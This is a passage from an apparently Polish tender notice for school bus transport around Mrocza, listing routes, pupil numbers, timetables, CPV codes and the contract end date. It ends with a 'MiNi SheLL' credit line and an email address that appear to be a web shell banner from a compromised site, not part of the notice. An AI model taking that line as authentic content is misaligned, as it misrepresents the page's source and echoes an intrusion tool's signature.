2. Przywóz 32 uczniów z Rościmina do Szkoły Podstawowej im. A. Mickiewicza w Witosławiu na godz. 740 (rozpoczęcie zajęć lekcyjnych w Szkole Podstawowej im. A. Mickiewicza w Witosławiu o godz. 750).

3. Odwozy uczniów dotyczą:

a) pierwsze odwozy (I) w poszczególnych kierunkach między godz.1200 a 1315 obejmują dzieci oddziałów 0 i uczniów klas I-III Szkoły Podstawowej w Mroczy, Szkoły Podstawowej w Witosławiu z miejscowości Rościmin i dzieci uczęszczających do oddziału przedszkolnego Przedszkola Miejskiego w Mroczy,

b) drugie odwozy (II) w poszczególnych kierunkach między godz. 1400 a 1530 obejmują uczniów klas IV-VI Szkoły Podstawowej w Mroczy, Szkoły Podstawowej w Witosławiu z miejscowości Rościmin i uczniów klas I-III Gimnazjum,

c) w niektóre dni tygodnia, w zależności od sporządzonych planów lekcyjnych szkół liczba uczniów w pierwszym i drugim odwozie może ulec zmianie (uczniowie klas IV-VI Szkół Podstawowych i klas I-III Gimnazjum kończą zajęcia w godz. między 1200 a 1315, lub nieliczni uczniowie klas I-III Szkół Podstawowych zostają na dodatkowych zajęciach).

4. Podane liczby uczniów do przewozu są liczbami szacunkowymi i mogą ulec zmianie w trakcie wykonywania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-8, 60.10.00.00-9, 60.17.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przewóz uczniów do i ze SP w Mroczy, Gimnazjum z miejscowości: Drążno, Drążonek, Samsieczynek..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje przewóz uczniów do i ze SP w Mroczy, Gimnazjum z miejscowości: Drążno, Drążonek, Samsieczynek.
Przewóz uczniów do i ze SP w Mroczy, Gimnazjum z miejscowości: Drążno, Drążonek, Samsieczynek.
Trasa PRZYWÓZ
Samsieczynek - Mrocza 15
Drążonek - Mrocza 19
Drążno - Mrocza 19
RAZEM: 53
Trasa ODWÓZ I 
Mrocza - Drążonek - Samsieczynek 15
Mrocza - Drążno 19
RAZEM: 34
Trasa ODWÓZ I I
Drążno - Drążonek 11

Przywóz 53 uczniów dotyczy dowozu uczniów z poszczególnych miejscowości do Mroczy na godz. 805 (rozpoczęcie zajęć lekcyjnych w Szkole Podstawowej w Mroczy, Gimnazjum im. Jana Pawła II w Mroczy o godz. 815 ).
Dzienna długość tras obejmujących przywóz i odwóz stanowi 48 km.
Przewoźnik w ramach świadczonej usługi zapewnia opiekę nad uczniami w czasie dowozu. Koszt opieki nad uczniami w czasie dowozu wkalkulowany jest w ostateczną cenę oferty.
Podane liczby uczniów do przewozu są liczbami szacunkowymi i mogą ulec zmianie w trakcie wykonywania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-8, 60.10.00.00-9, 30.17.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com